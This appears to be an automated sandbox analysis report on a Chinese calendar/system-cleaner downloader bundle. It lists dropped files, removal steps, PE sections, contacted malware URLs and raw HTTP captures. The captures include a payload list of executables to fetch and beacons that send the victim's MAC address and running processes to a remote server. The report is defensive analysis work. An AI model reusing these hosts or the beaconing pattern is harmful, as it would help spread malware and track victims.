%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7b0\DL.exe (3944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\BindPlugIn[1].ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\DL[1].exe (6242 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\034Óê ÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÖÃÂÇï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\toolbar_hover (3).png (531 bytes)
%Documents and Settings%\%current user%\Application Data\mmt.ico (881 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ùï½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\032Óê-áÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\huangli.xml (12024 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\´º½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\026Ñ©-´óÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\039Óê ±©Óêת´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\½Ìʦ½Ú.png (545 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Æßæ½Ú.png (930 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-Ò¹¼ä¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\023Ñ©-áѩתÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\052³¾ ɳ³¾±©.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-Ò¹¼äÕóÓê .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\input.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂû·ÑÕß.png (706 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Àö¯½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\setting.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\027Ñ©-´óѩת±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹úÇì½Ú.png (508 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_hover.png (680 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\³ýæ.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\manual.exe (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-Ò¹¼äÇç.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tip.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\024Ñ©-ÖÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\053³¾ ³¬É³³¾±©.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\047ÒõÌì.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾-ÃÂÂ.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\022Ñ©-áѩ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-Ò¹¼äÕóÑ© .png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_yes.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\723¼ÃÂÄî.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\yi.png (998 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\046Óê Óê¼ÃÂÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¶ËÎç½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Templates\16201410\YYM_955WD30.gif (930 bytes)
%Documents and Settings%\%current user%\Desktop\ÌìÆôÈÕÀú.lnk (909 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ê¥µ®½Ú.png (873 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace64.dll (3616 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸ß¿¼.png (555 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\Replace.dll (3312 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\028Ñ©-±©Ñ©.png (2392 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÌìÆôÈÕÀú.lnk (921 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\set.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB5.tmp (138023 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\043Óê ¶³Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uninst.exe (11048 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\time.dll (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_state5.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Base64.dll (4 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\044Óê À×ÕóÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\035Óê ÖÃÂÓêת´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\tjapis[1].htm (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\NewIcons007.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3b.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\041Óê ´ó±©Óêת³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÞÈ˽Ú.png (991 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÓÛÀ¼½Ú.png (913 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\Weather_none.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\021Ñ©-°×ÌìÕóÑ©.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\036Óê ´óÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\Math.dll (2392 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇåÃ÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\city.txt (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¾Å®½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸¸Ç×½Ú.png (846 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\button_3a.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\kindness.exe (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\tclock.ini (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\025Ñ©-ÖÃÂѩת´óÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ĸÇ×½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\045Óê À×ÕóÓê¼ÓÑ©.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¹â¹÷½Ú.png (536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_normal.png (713 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ji.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÈÕÀú1.png (7192 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uTray.exe (5064 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.mdb (12536 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÃÂÂÃâ€ÃƒÂ¶Ã‚±Â¸ÃÂü.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\tj.html (89 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\01-°×Ìì¶àÃâ€Ãƒâ€ .png (1552 bytes)
%Documents and Settings%\%current user%\Desktop\.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\054ÃŽÃÂ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\tray_no.png (450 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\033Óê áÓêתÖÃÂÓê.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\050³¾ ¸¡³¾.png (784 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÇéÈ˽Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\051³¾ Ñïɳ.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ddd.png (3 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\031Óê-°×ÌìÕóÓê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\037Óê ´óÓêת±©Óê.png (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrB6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\042Óê ³¬´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\00-°×ÌìÇç.png (1552 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Refresh_pushed.png (663 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\weathers.exe (38103 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\Ãâ€Ã‚ªÃÂü½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\¸Ã¶÷½Ú.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\setting.ini (20 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\038Óê ±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ƽ°²Ò¹.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\db2.ldb (64 bytes)
%Documents and Settings%\%current user%\Application Data\tqrili\uCalendar\ÌìÆø\040Óê ´ó±©Óê.png (1856 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\ÌìÆôÈÕÀú\ÅäÖÃ\Uninstall.lnk (922 bytes)
%System%\dm.dll (3902 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SkinH_EL.dll (88 bytes)
%System%\regsvr32.exe (300 bytes)
%System%\svhost.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SS540.exe (5873 bytes)
%Program Files%\sszs\uninst.exe (3082 bytes)
%Program Files%\sszs\xtsszsup.exe (8421 bytes)
%Program Files%\sszs\xtsszs.exe (7861 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\系统瘦身助手.lnk (650 bytes)
%Program Files%\sszs\xtsszs.dll (1568 bytes)
%Program Files%\sszs\mscomctl.ocx (21984 bytes)
%Documents and Settings%\%current user%\Desktop\系统瘦身助手.lnk (638 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\系统瘦身助手\å¸载系统瘦身助手.lnk (479 bytes)
%System%\diactss.dll (40 bytes)
%System%\netsh.exe (692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\i.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CF»Æ¹ÃÂøÊÓ¸¨Öúv5.6.exe (17629 bytes)
C:\lpk.dll (601 bytes)
C:\RCXBA.tmp (16516 bytes)
%System%\hra33.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\onlinefirst[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xtsszs_qn2.exe (3915 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ws.exe (897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[1].txt (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\ws[1].exe (13382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\tqrl_90_4090[1].exe (601850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\19MJKZWM\17048312[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\KK8ZCQNM\xtsszs_qn2[1].exe (138776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\icon_7[1].gif (922 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\NC09J4MH\y[1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cookies\Current_User@zw.cn170[2].txt (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Internet Files\Content.IE5\WR4J4R41\tj[1].htm (314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tqrl_90_4090.exe (20507 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| SEC | 4096 | 3608 | 1536 | 3.61819 | 5dd434da7f8bb065242d5c89668ae5e7 |
| .rsrc | 8192 | 2492226 | 2492226 | 5.4455 | 5a73a37fddcd1df11e88c5db8f120526 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://zw.cn170.com/tj.html | 58.221.60.133 |
| hxxp://zw.cn170.com/y.txt?6537536855 | 58.221.60.133 |
| hxxp://js.users.51.la/17048312.js | 113.107.42.34 |
| hxxp://c06.i06.arnic.hadns.net/6/tqrl_90_4090.exe | |
| hxxp://c06.i06.arnic.hadns.net/0815/help1.html | |
| hxxp://www.meimotuan.com/ico.ico | 114.215.202.132 |
| hxxp://icon.ajiang.net/icon_7.gif | 125.46.49.200 |
| hxxp://dx5.3525.com/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/ | |
| hxxp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_qn2.exe | 42.120.230.9 |
| hxxp://down.gtm.ucweb.com/pcbrowser/down.php?pid=4299 | |
| hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf273346271357355270352363270250366372v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 | 118.192.75.167 |
| hxxp://zw.cn170.com/ws.exe | 58.221.60.133 |
| hxxp://www.xxdtec.com/winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 | 118.192.75.167 |
| hxxp://union.yoyolm.net/tjapis.php?mac=000C29EC7FC5&st=1&exez=tqrl_90_4090.exe&exef=DL.exe&pass=e4df6e48b09cbba7c493c1139b8aca47&url1=hxxp://ya.ru/&url2=hxxp://dasf.cn/ | 222.186.130.92 |
| hxxp://down.tianyunxj.com/6/tqrl_90_4090.exe | 116.11.254.249 |
| hxxp://www.xxdtec.com/winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 | 118.192.75.167 |
| hxxp://update.yoyolm.net/0815/help1.html | 116.11.254.249 |
| hxxp://down2.uc.cn/pcbrowser/down.php?pid=4299 | 211.103.82.247 |
| hxxp://uu.cn170.com/y.txt?6537536855 | |
| hxxp://uu.cn170.com/ws.exe | |
| web.51.la | 117.21.226.40 |
| chinaljndk.3322.org | 58.221.60.133 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /icon_7.gif HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: icon.ajiang.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=14400
Content-Length: 922
Content-Type: image/gif
Last-Modified: Fri, 26 May 2006 14:27:28 GMT
Accept-Ranges: bytes
ETag: "088d583d080c61:1496"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:53 GMT
Connection: close
GIF89a0.............`..?..>.. ....|..........................!..NETSCAPE2.0.....!.......,....0........I..8.!........!1.b..0)..g.-..x.. .o%......$X.q;.0.|..6....q{.A@..C..k2.e'....H'O....yj..5.*................4.A:Pop...........M9;:.J..........H$... H...........8......A...............!.......,....*.....^..1)..^....H..4!...l{Ic)..Y....d...I.3<.^...`*,..g..]"......>..&4..z.O.5<&.....4...p.J^....z ..!.......,....-.....l.!1)...k.. xI..U^..$..... .~e.vg..3.....FF.p.C.B.')j.Pc..q..YO..$:0N..T.B.|.O..GCz......g.x4...d...~...V..4..!.......,....-.....d..1)...k.. xI.@l.G._.........[.!..@..e#bN. .P.....S..2.W..2.>.P......fO...V..r.(.K..L^....-x{.|...-..!.......,....-.....w.!1)...k.. xI..U^.....c.j.:|7..Yw..[.1..z.c(HD...fk( .,.k.d............ ;.^w..s...sZJ.{...5bb.ghClzC....5..n..k...Y..5..!.......,....-.....o..1)...k.. xI.@l.G._...;"gG....r*f........ ....n...)......[.v.. B,..3./W....Yl5'9Z.m..<....}V.o.}....t.......9..;..
GET /17048312.js HTTP/1.1
Accept: */*
Referer: hXXp://zw.cn170.com/tj.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: js.users.51.la
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Length: 1980
Content-Type: application/x-javascript
Last-Modified: Wed, 16 Jul 2014 03:29:10 GMT
Accept-Ranges: bytes
ETag: "2ce8d71ba6a0cf1:197d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:18 GMT
Connection: close
document.write ('<a href="hXXp://VVV.51.la/?17048312" target="_blank"><img alt="51.la 专业、免费、强健的访问统计" src="hXXp://icon.ajiang.net/icon_7.gif" style="border:none" /></a>\n');..var a8312tf="51la";var a8312pu="";var a8312pf="51la";var a8312su=window.location;var a8312sf=document.referrer;var a8312of="";var a8312op="";var a8312ops=1;var a8312ot=1;var a8312d=new Date();var a8312color="";if (navigator.appName=="Netscape"){a8312color=screen.pixelDepth;} else {a8312color=screen.colorDepth;}..try{a8312tf=top.document.referrer;}catch(e){}..try{a8312pu =window.parent.location;}catch(e){}..try{a8312pf=window.parent.document.referrer;}catch(e){}..try{a8312ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8312ops=(a8312ops==null)?1: (parseInt(unescape((a8312ops)[2])) 1);var a8312oe =new Date();a8312oe.setTime(a8312oe.getTime() 60*60*1000);document.cookie="AJSTAT_ok_pages=" a8312ops ";path=/;expires=" a8312oe.toGMTString();a8312ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8312ot==null){a8312ot=1;}else{a8312ot=parseInt(unescape((a8312ot)[2])); a8312ot=(a8312ops==1)?(a8312ot 1):(a8312ot);}a8312oe.setTime(a8312oe.getTime() 365*24*60*60*1000);document.cookie="AJSTAT_ok_times=" a8312ot ";path=/;expires=" a8312oe.toGMTString();}catch(e){}..try{if(document.cookie==""){a8312ops=-1;a8312ot=-1;}}catch(e){}..a8312of=a8312sf;if(a8312pf!=="51la
<<< skipped >>>
GET /ico.ico HTTP/1.0
Host: VVV.meimotuan.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Date: Thu, 16 Oct 2014 21:26:52 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 18 Jun 2014 06:03:51 GMT
ETag: "e8901-25be-4fc16063d5483"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: image/vnd.microsoft.icon
......00.... ..%......(...0...`..... ......$...................}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~.......}...q...c..._...`...`..._...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...~.......{...e...V...V...Y...X..}S..}R...Y..._...`...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}...}.......}...j...[...............................o..~U...W..._..._...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}...}...}...|...~...~...t..._...`...........................................x..}T...\...`...^...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...}...}...}.......{...i...\..~V.......................................................\...Y...`...^...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}...|...~.......v...b...]..~V...{...........................................................c...Y...`...^...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...}...}.......}...n...^...\...a..zR..................................................................._...[..._...^...^...^...^...^...^...^...^...^...^...^...^...}...}...}...}...}...}...}...}...~...~...t...d...\...^...^...a..zQ................................................................
<<< skipped >>>
GET /winapp/manager/install.php?login=spoolsv.exe explorer.exe mscorsvw.exe jqs.exe alg.exe disablejavawarnsec.exe vmtoolsd.exe vmtoolsd.exe wmiprvse.exe sandbox_svc.exe cmd.exe tshark.exe cmd.exe procmon.exe cf............v5.6.exe i.exe dl.exe ignite.exe mankind.exe netsh.exe netsh.exe xtsszs.exe wmiprvse.exe (Sum:35)Windows XP Service Pack 3[5.1.2600](32)(XP1)&mac=000C29EC7FC5&user=xtsszs_qn2.&ver=1.11 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Thu, 16 Oct 2014 21:27:12 GMT
....
GET /winapp/manager/onlinefirst.php?user=xtsszs_qn2.&mac=000C29EC7FC5 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.xxdtec.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Charset: big5, big5-hkscs, euc-jp, euc-kr, gb18030, gb2312, gbk, ibm-thai, ibm00858, ibm01140, ibm01141, ibm01142, ibm01143, ibm01144, ibm01145, ibm01146, ibm01147, ibm01148, ibm01149, ibm037, ibm1026, ibm1047, ibm273, ibm277, ibm278, ibm280, ibm284, ibm285, ibm290, ibm297, ibm420, ibm424, ibm437, ibm500, ibm775, ibm850, ibm852, ibm855, ibm857, ibm860, ibm861, ibm862, ibm863, ibm864, ibm865, ibm866, ibm868, ibm869, ibm870, ibm871, ibm918, iso-2022-cn, iso-2022-jp, iso-2022-jp-2, iso-2022-kr, iso-8859-1, iso-8859-13, iso-8859-15, iso-8859-2, iso-8859-3,
GET /tj.html HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: zw.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 314
Content-Type: text/html
Last-Modified: Mon, 19 May 2014 16:33:12 GMT
Accept-Ranges: bytes
ETag: "2682478073cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
<script language="javascript" type="text/javascript" src="hXXp://js.users.51.la/17048312.js"></script>..<noscript><a href="hXXp://VVV.51.la/?17048312" target="_blank"><img alt="我要啦免费统计" src="hXXp://img.users.51.la/17048312.asp" style="border:none" /></a></noscript>..
GET /y.txt?6537536855 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 189
Content-Type: text/plain
Last-Modified: Mon, 13 Oct 2014 14:52:14 GMT
Accept-Ranges: bytes
ETag: "a6f547f5e6cf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:26:14 GMT
hXXp://down.tianyunxj.com/6/tqrl_90_4090.exe..hXXp://xtsszs.oss-cn-hangzhou.aliyuncs.com/xtsszs_qn2.exe..hXXp://down2.uc.cn/pcbrowser/down.php?pid=4299..hXXp://uu.cn170.com/ws.exe..........
GET /ws.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: uu.cn170.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 73821
Content-Type: application/octet-stream
Last-Modified: Thu, 02 Oct 2014 03:07:13 GMT
Accept-Ranges: bytes
ETag: "ca4c18f7edddcf1:3f0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 16 Oct 2014 21:27:01 GMT
